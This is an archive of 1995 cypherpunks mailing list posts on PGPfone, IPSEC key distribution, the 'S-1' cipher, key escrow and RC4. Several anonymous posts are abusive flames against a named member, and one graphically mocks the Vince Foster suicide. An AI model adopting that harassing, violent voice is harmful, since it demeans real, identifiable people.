From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Thu, 10 Aug 95 20:34:59 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02130500ac507dd9a872@[199.117.100.2]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>BTW, he has been beat by Nautilus, right? Nautilus
>is public domain, right? (I'm thinking of that public
>domain voice encryption released a few mos ago).
>I wonder if he is going to try to put a "spin" on this
>one to differentiate it from the other one. on the
>other hand, just having his name on it is plenty of
>"spin"...

When I originally volunteered to help with coding on the PGP voice stuff,
the author (I think) of Nautilus sent me, and the rest of the PGP voice
mailing list participants, version 0.2 for review.  The initial plan was
to take the Nautilus code, rewrite it in a more modular fashion, and add
encryption to create voice PGP.  However, the incarnation of the PGP voice
mailing list we were using for the project just died, and I heard nothing
more about Nautilus after I submitted my comments and suggestions -- until
the release of Nautilus 0.9.

So if Nautilus code was not used in PGPfone, I suspect licensing or other
such issues got in the way, and Will Price and crew started from a
different base. Then again, perhaps Nautilus and PGPfone have much in
common.  We'll have to wait for the PGPfone release for the answer.


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCrPhfobez3wRbTBAQHM8AP6AjrIg3j2FjRW1vXSLJQ201cTbOic9Tms
3e6TtCdKu4m9OfOyJDIa+RuW+gRIpF8uBmhDAT8d50rhWa9RdEqAgxRSS6mLtzho
ExxjSaX3JPdbZjW5G6kMamN9czMFd1hfkxfBMTMVLFdnYzUhG/MQZCyJzLHqcy0c
idV9OPHTrck=
=bGwv
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Thu, 10 Aug 95 18:56:33 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508101452.KAA24637@panix4.panix.com>
Message-ID: <m0sgj9W-000wP1C@myriad>
MIME-Version: 1.0
Content-Type: text/plain


sdw@lig.net (Stephen D. Williams) wrote:

> I really like the idea of using DNS for (public I assume) keys...

I don't.

Public keys in the DNS is a bad idea because it makes it difficult to
update the database, especially in large organizations.  When a host's
key is issued or changed then they would have to get the nameserver
admin to change it for them.  This could become a major problem/
inconvenience for many, many people.  The host should be able to give
its own key in response to a query.  That key could, of course, be
signed by any number of trusted signators to guarentee authenticity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 10 Aug 95 18:52:57 PDT
To: cypherpunks@toad.com
Subject: Re: "Protect the children" as passphrase to Constitution
Message-ID: <199508110150.VAA26775@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Every time I hear some porker say, "Protect the children," the BS
translator that resides in my brain replaces the word "Protect"
with the words, "Treat adults like." Probably a mental defect.
JMR
PS
RIP Jerry G.  Let's cease the flamewar for 24 hours, in memory.


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCq1/m1lp8bpvW01AQGg8gQAiq+kzyQopCLFQtzPhr4WIN42I41ZDPyh
1qH1/DBHAS8BaNqK8f9jObEvG4a5dlpbzp5c0FdJ2cbcZtG/GZIG3clUPNd0cqtf
hR1abL8pTgoj7WMclOMF6iclzRn/fcHY9VawZHT10At3I11eyjOq3hBsfIU1c1IG
9pjlPeEW/IE=
=Ci1C
- -----END PGP SIGNATURE-----
Regards, Jim Ray

PGPsign all your cleartext messages! [Makes the statists nervous.]
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCq3ESoZzwIn1bdtAQGfFQF9FL9ptx5QVfg6nGL+NePHg6cuq3B2fa/U
9Ir2SmI6NZQPgjvFtCPO9ZmepaLBkEqs
=+nDm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 10 Aug 95 20:50:49 PDT
To: perry@piermont.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <199508110337.XAA15986@panix2.panix.com>
Message-ID: <Pine.ULT.3.91.950810224841.16955A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 10 Aug 1995, Perry E. Metzger wrote:

> I was under the impression Detweiler was legally obligated not to post
> to this mailing list.

Myabe it's just me, but I guess I fidn the occasional rants and such to 
be a light-hearted relief from the more serious name-calling and ranting 
:-) 

Of course, anything I see posted anonymous (or emailed to me anonymously, 
except by such services as penet.fi or PGP signed) isn't taken with any 
seriousness at all.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMCq3pDokqlyVGmCFAQHg4wQAiXFo/rAgKFebLI92H/ILMTH3Og1LAzmD
uIQo2Dda+oXadFVva6s8OC1dkV+sJQjXFYOWrSZ4G91N0fwtsMRfKeTkv7XigxIA
sQhjC1zWtgqgGQTohhhEanMz64I/g0r/3BQyiKG+Pq18dmG07yxgQouP3wSTmgXZ
oBDVGyumt6A=
=OGNs
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 20:36:15 PDT
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199508102329.SAA21100@bsu-cs.bsu.edu>
Message-ID: <199508110336.XAA12412@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



With friends like, er, our old friend here, who needs enemies?

Anonymous writes:
> will someone just CUT THE @#$%^&* FOSTER CONSPIRACY THEORIES??
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 20:37:59 PDT
To: cypherpunks@toad.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <199508102337.BAA14035@utopia.hacktic.nl>
Message-ID: <199508110337.XAA15986@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> I'm tired of Perry. he's always ranting and stirring the shit.

I was under the impression Detweiler was legally obligated not to post
to this mailing list.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 20:49:29 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <m0sgj9W-000wP1C@myriad>
Message-ID: <199508110349.XAA08572@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew Ghio writes:
> sdw@lig.net (Stephen D. Williams) wrote:
> 
> > I really like the idea of using DNS for (public I assume) keys...
> 
> I don't.
> 
> Public keys in the DNS is a bad idea because it makes it difficult to
> update the database, especially in large organizations.

Thats one of a number of reasons why the DNS dynamic update facility
has been created.

> The host should be able to give
> its own key in response to a query.

What makes you assume we are using hosts as the keyed endpoints in the
usual case? Users are also getting keys, and querying them will be
difficult until humans all come equipped with implanted radio
transmitters. See "The Presidents Analyst" for a possible solution to
that problem, but I prefer DNS :-)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 20:54:24 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <Pine.3.89.9508110008.D1336-0100000@shaq.midex.com>
Message-ID: <199508110354.XAA09825@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



There seem to be a bunch of people interested in helping with a Linux
version of IPSEC. If you guys could spontaneously self-organize it
might help -- I unfortunately am not in a good position to do it for
you :-)

Having a Linux version would be extremely key -- I'm very glad to see
the enthusiasm for it.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Thu, 10 Aug 95 20:58:52 PDT
To: cypherpunks@toad.com
Subject: Re: More "S-1" foolishness (fwd)
Message-ID: <Pine.3.89.9508102352.A620929653-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


How about this?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm

---------- Forwarded message ----------
Date: Thu, 10 Aug 1995 23:34:42 -0400 (EDT) 
From: Dorothy Denning <denning@cs.cosc.georgetown.edu>
To: mfroomki@umiami.ir.miami.edu
Cc: denning@cs.cosc.georgetown.edu
Subject: Re: More "S-1" foolishness (fwd) 

Thanks for sending all this stuff.  The algorithm is definitely
not Skipjack.  Feel free to pass this along if you'd like.

Cheers,
Dorothy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Thu, 10 Aug 95 16:02:07 PDT
To: turner@telecheck.com
Subject: Re: Bank Fees and E-Cash
In-Reply-To: <9508100004.AA03734@TeleCheck.com>
Message-ID: <Pine.3.89.9508110043.A1336-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Aug 1995 turner@telecheck.com wrote:

> Citibank and MasterCard are developing an "internet" ways for you to use 
> your credit cards, not e-cash.  Microsoft is developing ways to pipe that
> information to them.  These are not going to solve the problem, especially
> at 18.9% A.P.R...

Can somebody give us an update as to how this is going.  I would like 
strong, real, digital cash, but until then, some of us could utilize this 
at the very least.  

Updates or pointers?...  

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@wwa.com>
Date: Thu, 10 Aug 95 22:14:00 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <m0sgj9W-000wP1C@myriad>
Message-ID: <Pine.BSD.3.91.950811001051.1066E-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Matthew Ghio wrote:

> sdw@lig.net (Stephen D. Williams) wrote:
> 
> > I really like the idea of using DNS for (public I assume) keys...
> 
> I don't.
> 
> Public keys in the DNS is a bad idea because it makes it difficult to
> update the database, especially in large organizations.  When a host's
> key is issued or changed then they would have to get the nameserver
> admin to change it for them.  This could become a major problem/
> inconvenience for many, many people.  The host should be able to give
> its own key in response to a query.  That key could, of course, be
> signed by any number of trusted signators to guarentee authenticity.
>
There are some other problems too I believe.  I have worked for a decent 
sized network who did all user authentication at the terminal servers for 
dial-in accounts thru DNS.  This wasn't too bad for just passws and 
stuff, but wouldn't this cause some bloat in the nameservers database?  
As well as cause problems security wise when it comes to updates.  Would 
these automatically not be cached in any form by the site making the 
request?  This also causes a problem for smaller time people who perhaps 
have a PPP/SLIP connection 24/7 but have nameserve done by their prvider, 
and I for sure don't want my provider to be in control of those keys. 
 

Nesta Stubbs		  "under the streamlined chrome shell, you'd 
Cynico Network Consulting   find the same victorian mechanism." WG
nesta@wwa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Thu, 10 Aug 95 16:42:29 PDT
To: David Neal <dneal@usis.com>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <Pine.BSI.3.91.950810134314.7478B-100000@usis.com>
Message-ID: <Pine.3.89.9508110008.D1336-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be involved with any final stages of the Linux port.  I 
run a now, fairly defunct business off of my Linux Box and can afford 
some troubles in alpha testing.  Let me know when things are near a 
testing stage guys.

Oh, and by the way, thanks for doing this everyone.  It is VERY important!

Matt

On Thu, 10 Aug 1995, David Neal wrote:

> I'd like to also volunteer to do the linux port, whether it be
> coordination patches, hacking code, finding people, whatever.
> 
> 

> David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
> Unix, Sybase and Networking consultant. "...you have a personal responsibility 
> to be pro-active in the defense of your own civil liberties." - S. McCandlish
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 11 Aug 95 01:16:57 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Protect the children" as passphrase to Constitution
Message-ID: <199508110813.BAA25692@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 PM 8/10/95 -0700, Tim wrote:
>- Clinton's Executive Order today which limits advertising of cigarettes,
....
>(Oh, and one amazing detail: the possible issuance of I.D. cards to all of
>those under the age of 18. Besides being useful for things like curfews,

What!?!?!?!  I guess I'm not totally surprised - registration of all children
has been high on Clinton's agenda ever since he's been in the White House.
One of the more blatant examples was the child vaccination proposals - which
first started out as "take over the vaccination system and register all kids
so we can remind their parents to get their shots", and gradually included 
less and less control and funding of vaccination while retaining the
registration.
Sigh.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 11 Aug 95 01:17:08 PDT
To: trei@process.com
Subject: Re: "S1" encryption system (was: this looked like it might
Message-ID: <199508110814.BAA25707@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:13 AM 8/10/95 -6, you wrote:

As with Peter and Nathan, I'm also a former tool of the military-industrial
complex (:-), and Peter's right that the probably source of this assertion
is that there's seldom any "vanilla" TOP SECRET data - anything that's sensitive
enough to get TOP SECRET handling rules is usually part of some compartmented
project (compartmentalization is a formalized version of Need to Know,
where you need to be read into PROJECT X to get PROJECT X data.)
Sensitive Compartmented Information is one well-known class of stuff.
Codeword projects are identified by words picked off a list of
content-free names; some codewords that have been outed in the past are
ULTRA and UMBER.

In addition to project-specific classifications, some of the kinds of labels
on material
include variants on INTEL, CNWDI (Critical Nuclear Weapons Design Information),
RESTRICTED DATA (less critical nuclear weapons data), FORMERLY RESTRICTED DATA
( a weird classification for material that isn't RESTRICTED DATA any more but
they still don't want to let folks see.)

And then there's the sort of data that's SECRET by the time the people doing the
grunt-work see it, but it's various extracts of REALLY SPOOKY DATA,
that only a few people back in some agency know the whole picture,
and it's parcelled out so one group of people gets asked to build a
laser-scanner
like this, and another gets asked to build a computer system like that,
or a mirror adjuster like that, and none of the grunts know whether the
whole deal 
is personal teleportation system (the cover project) or a space-based
assassination system,
much less how they decided on the targets....

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 10 Aug 95 22:31:05 PDT
To: cypherpunks@toad.com
Subject: Clinton to resign?
Message-ID: <Pine.SOL.3.91.950811012207.19227A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain



Associated Press reported on August 10, 1995:
 
President Won't Resign But...

(WASHINGTON)

President Clinton wasn't about to give a serious 
answer when he was asked Thursday if he might resign. 

The question came from veteran columnist Sarah McClendon, who asserted 
that some legislators from the left and right were trying to push him 
out of office.

[...]

"Well, if you promise to run off with me I might," Clinton responded,
... "But otherwise, I can't think of any reason." 

- - - - - - - - - -

Repeat after me:

There's nothing to those crazy conspiracy theories.
There's nothing to those crazy conspiracy theories.....







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Thu, 10 Aug 95 16:29:33 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0sgh1i-00029BC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


perry, of course, is a dysfunctional human "cipher" himself,
who couldn't be civil if he was at a tea party of grandmothers.
yes, in 15 minutes he would end up screaming and
 mooning them all because they hadn't heard of Netscape or Chaum or something. 
what a prick. so he wants to lobby congress and write some code??
well perry, good for you. you just go off on your little
excursion. let us know how you are doing. send some postcards
to Blacknet, OK???

as for TCM and his invest-in-stocks-and-evade-taxes shtick, it's
starting to bore me too. frankly I think that both TCM and
PM should take a long, long vacation from the cypherpunks list
and go take a cruise together. yes, help patch up that relationship
that is so strained lately. it hurts us all to see two grown
men fighting each other. make love, not war!!! hehehehe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 10 Aug 95 16:37:38 PDT
To: cypherpunks@toad.com
Subject: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <199508102337.BAA14035@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I'm tired of Perry. he's always ranting and stirring the shit.
he's always setting himself up as the savior of the list
signal. what the hell has he really written? oh, the poor
bastard has holed himself in his apartment to write 
crypto code or the world is going to die tomorrow. 

thank you, mr. Jesus Christ, Nailed to a Cybercross.

 WHY HATH WE FORSAKEN HIM??? oh, I can
see the blood oozing from the gaping flesh wounds. poor
Perry, having to bear this horrible cross while everyone
else stands around and gawks and remarks about Foster 
conspiracy theories... yes, we are being utterly inconsiderate
of his splendor and selflessness. has anyone seen
Mathew, Mark, John, or Luke around??? Perry has something
to say to them.

oh, and Perry has become Mr. Cyberlobbyist. yes, just
what we NEED, is another person to be sucked up and
ground up in the oozing washington slime regurgitator.
well, if it would swallow him up and never spit him
out, perhaps we should encourage him in his newfound
political passions.

I have seen an awful lot of noise on the
list, and I'm pretty f***ing amazed at how much of it
is due to PM and his BLACKBOARD FINGERNAIL SCREECHING.
he's worse than detweiler. actually, I think he may be a 
detweiler tentacle.  he's certainly doing a fantastic
impression of it.  mr. holier than thou Protector of the
Cypherpunks. 

perry, just go stay in your dark apartment and write your
code. we'll be happy to hear from you in a year when you
have all your little tinkertoy prototypes put together with
threads and bubblegum.  

TCM is not the first person you have violated by posting
private mail. you are the lowest cypherscum for violating
privacy, perry. you know that if anything is sacred
to cypherpunks, it is Tim May and privacy, and frankly
I think you have been doing just a little to much pissing
on both of them lately. oh, violate Tim May's privacy?
well, stab two sacred cows with one bazooka, why don't
you, you little bastard... do we have any need for you?
maybe tim may is a weenie, but I'd rather have a weenie
around then YOU, and I think virtually EVERYONE HERE
concurs on that point... why don't you take a vacation from
the list? TCM has the guts to do this, and has done so
in the past. but you are just a bloated buffoon who
cannot tell when he is not wanted somewhere even as
people spit in your face.  hee, hee, reminds me of
someone else I know.

but frankly, perry, I don't think you have the balls to 
go away. if you are a real programmer, and all the real programmers
have left, what does that make you? stupid, I'd say. we would
not miss you one whit if you left, Perry. in fact I think
it's safe to say that we'd be quite delighted if you would
take your constant shit-stirring somewhere else and get
a life. TCM may have a pathetic excuse for a hobby,
but you have a pathetic excuse for a LIFE. I know you
personally Perry, and you couldn't conduct yourself in
a meeting of civilized people if you had your tongue 
chopped off, and I think there's plenty of meetings you've
been to when your peers were wishing exactly that....


xxxxxxooooo <- hugs and kisses, darling perry puppy








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 10 Aug 95 16:45:13 PDT
To: cypherpunks@toad.com
Subject: F*** FOSTER
Message-ID: <199508102345.BAA14099@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


this vince foster thing is BS. total bs. Perry is right.
there's not a single smidgeon of honest reporting going
on. its just slime being stirred up by internet thugs
and rapscallions. let foster rest in peace. multiple
people have ruled it was a suicide. perry can attest
that it was a suicide. perry can attest that the NSA
was not involved. he has seen everything, and if he has
an opinion on something, you can take his word that it
was based on the FACTS. the FACTS of the case are that
FOSTER was fed up with his nothing life, and pulled
the trigger and blew his brains out in a park. so what
if they couldn't find the brains anywhere? or they
are missing a few here and there??? they were 
splattered on the grass. when there is that much splatter
all over the place, you can be sure that the people
showing up with the spatula are not going to be that
meticulous. they probably did about 5 minutes of 
scrape, scrape, scaping and then vomited and passed
the spatula to the next guy. I mean, cut these guys
some slack.

the NSA stuff is total, utter poppycock. the NSA has
absolutely nothing to do with vince foster. Clinton
has nothing to do with foster. Hillary has nothing
to do with foster. why, the way people are ranting you'd
think there is a major political scandal going on.
NOTHING IS GOING ON HERE. please step aside, and move
along. PLEASE MOVE ALONG FOLKS, THERE'S NOTHING MORE TO
SEE HERE.

the fact that foster may have had access to intelligence
secrets such as cryptography is IRRELEVANT to the
cypherpunks. the fact that a scandal may have taken place
is IMMATERIAL  to our goals. our goals are to WRITE
CODE. FOR GOD'S SAKE, WRITE THAT CODE. I don't care if
you have to create code generators. CODE, CODE, CODE.
post the code to the cypherpunks list. talk about the
code. critique the code. study the code. salvation for
all humanity lies in finding the magic formula. and we
can't find it, UNLESS WE CODE, DAMMIT. perry understands
this. some people think that there is a magic government
program that will solve poverty, give freedom to everyone
in the US, and solve P=NP. they're WRONG. the government
cannot do any of this. BUT PROGRAMMERS CAN!!!!

put your programming hats on. if you haven't banged a 
keyboard a half million times, fired up VI to edit a
C file for the ten zillionth time, NO PROGRESS IS BEING
MADE. ITS AS SIMPLE AS THAT. if you haven't compiled 
something recently, RECOMPILE IT JUST TO BE SAFE. we
just aren't making any progress without CODE, CODE, CODE.
we have an utter shortage of code. the problem is not
politics, but LACK OF CODE. anyone can look at the net
today and see there is a HORRENDOUS SHORTAGE OF CODE
IN CYBERSPACE. we have to train everyone to program 
NOW or the future is lost to the incompetent. we will
be back to Vic 64's if people don't keep up the constant
programming. software is the key to salvation. 

every second devoted to the vince foster thing is a
precious second taken away from code. NOTHING POSITIVE
CAN COME OF PREOCCUPATION WITH CONSPIRACY THEORIES.
PERRY CAN ATTEST TO THAT. remember when PRZ was getting
indicted? perry was right on then too. some people were
scared shitless and raving out of their minds, saying the
world would end tomorrow, but NOT PERRY. perry has NO
FEAR. he said that we should CODE, CODE, CODE. and you
know what??? HE'S RIGHT. if people followed PERRY, we
would not be in this @#$%^&* predicament we are in.
if we could just get it so that every person who signed
up to the internet could CODE, we would be home free.
salvation. utopia!!! then we could rest a little. but
only a little, otherwise the NSA will beat us again
at the code race.

once again: forget Foster. nothing, absolutely nothing
about this scandal could possibly help our cause of
trying to expose corruption in government to the 
mainstream populace, to keep them better informed, to
put limits on the NSA, to show that they have been
involved in horrendous abuses, that there is something
utterly smelly in our government. FORGET IT. NOTHING
LIKE THIS WILL EVER BE PROVEN OR ESTABLISHED. IT'S
IMPOSSIBLE, JUST LIKE PERRY SAYS SO.

when anything new comes of this foster stuff, just remember
that perry predicted way ahead of time that it would amount
to NOTHING, NOTHING, NOTHING. and the more you preoccupy
your brains with this TOTAL MINUTIA, the less you are coding.
STOP IT RIGHT NOW. just remember, if you don't, you will
be SORRY, and when you come crying back to Perry that nothing
of value came of all your conspiracy mongering, he will
have NO SYMPATHY, in fact if he had a gun around he'd 
probably be tempted to blow your brains out. and you
can just FORGET about the spatula.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 11 Aug 95 02:14:55 PDT
To: cypherpunks@toad.com
Subject: Re: More "S-1" foolishness
In-Reply-To: <199508110353.UAA04743@jobe.shell.portal.com>
Message-ID: <199508110914.CAA11614@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Hal <hfinney@shell.portal.com> writes:
> It is possible I suppose that the F and G boxes are not the ones used
> in the "real" version of whatever cipher this is, so this apparent
> weakness and the ones which Matt has pointed out may not be that
> significant.

To the extent that one can believe the comments, it's more than "possible":
they say that the F and G boxes differ in the S-2 version.  One reason for
doing it this way might be to isolate the sensitive actual values from
people doing analysis or development at a grosser level.  That doesn't
explain the [r] bug you spotted, of course.

	Jim Gillogly
	Sterday, 19 Wedmath S.R. 1995, 09:12




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 10 Aug 95 23:18:41 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Key escrow granularity (Was: If only Vxxxx Fxxxxx had used encryption)
In-Reply-To: <8AEE4DC.0003000301.uuout@famend.com>
Message-ID: <9508110618.AA16373@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Monty Harder writes:
> The details of the protocol(s) can be worked out after the basic premise:
> 
>        There is no reason for anyone to give up the "master key" to all
>      of their business, when the minimal overhead in storage space for
>      adding an escrowed =session= key will suffice.

More generally, the granularity of the chunk of data protected by each
escrowed key can be varied -- the tradeoff is between the cost of a key
loss and the cost of data storage. A few escrowed master keys are very
cheap to store and very expensive to lose. Each session key is
comparatively worthless on its own, but you could end up having to store an
avalanche of them.  I suspect that something close to session granularity
makes sense in the real world; multi-GB HDs tend to be much cheaper than
asking the NSA to guess your keys for you, etc. Of course, you could also
get into escrowing project keys, dept. keys, etc., ad nauseum.

Choosing session granularity is highly recommended when permitting GAK a la
SB 974 :|

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 10 Aug 95 23:21:36 PDT
To: cypherpunks@toad.com
Subject: Re: This summer's special delivery?
Message-ID: <199508110619.CAA29700@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac4eb0c9030210046e6c@[205.199.118.202]>, tcmay@got.net
(Timothy C. May) wrote:


>I have nothing further to add on this. But recall that it was just about
>this time last year--just before Crypto--that the "alleged RC4 code" was
>posted anonymously to the list.

Do I recall correctly that that RC4 proved to interoperate with the "real" RC4?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCr2PCoZzwIn1bdtAQEUPAF/S1arfdr01B+/o5MlEX6F60NHUL6vgEPQ
sv3264ZCsJAl7TBqqyi1a6baBF7uuTh+
=jhLU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 10 Aug 95 23:40:20 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: This summer's special delivery?
In-Reply-To: <199508110619.CAA29700@bb.hks.net>
Message-ID: <9508110640.AA16646@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
> Do I recall correctly that that RC4 proved to interoperate with the
> "real" RC4?

Yes.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 10 Aug 95 23:47:42 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <199508110645.CAA29891@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508110254.TAA02204@netcom14.netcom.com>, vznuri@netcom.com
("Vladimir Z. Nuri") wrote:

>as if PRZ is not already enough of a folk hero....
>BTW, he has been beat by Nautilus, right? Nautilus
>is public domain, right? (I'm thinking of that public
>domain voice encryption released a few mos ago).
>I wonder if he is going to try to put a "spin" on this
>one to differentiate it from the other one. on the 
>other hand, just having his name on it is plenty of
>"spin"...

I can't violate my NDA, but PGPFone will be a *major* revolution for
communication security. I would not be surprised to see several hundred
thousands of users. PGP will plale in comparison.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

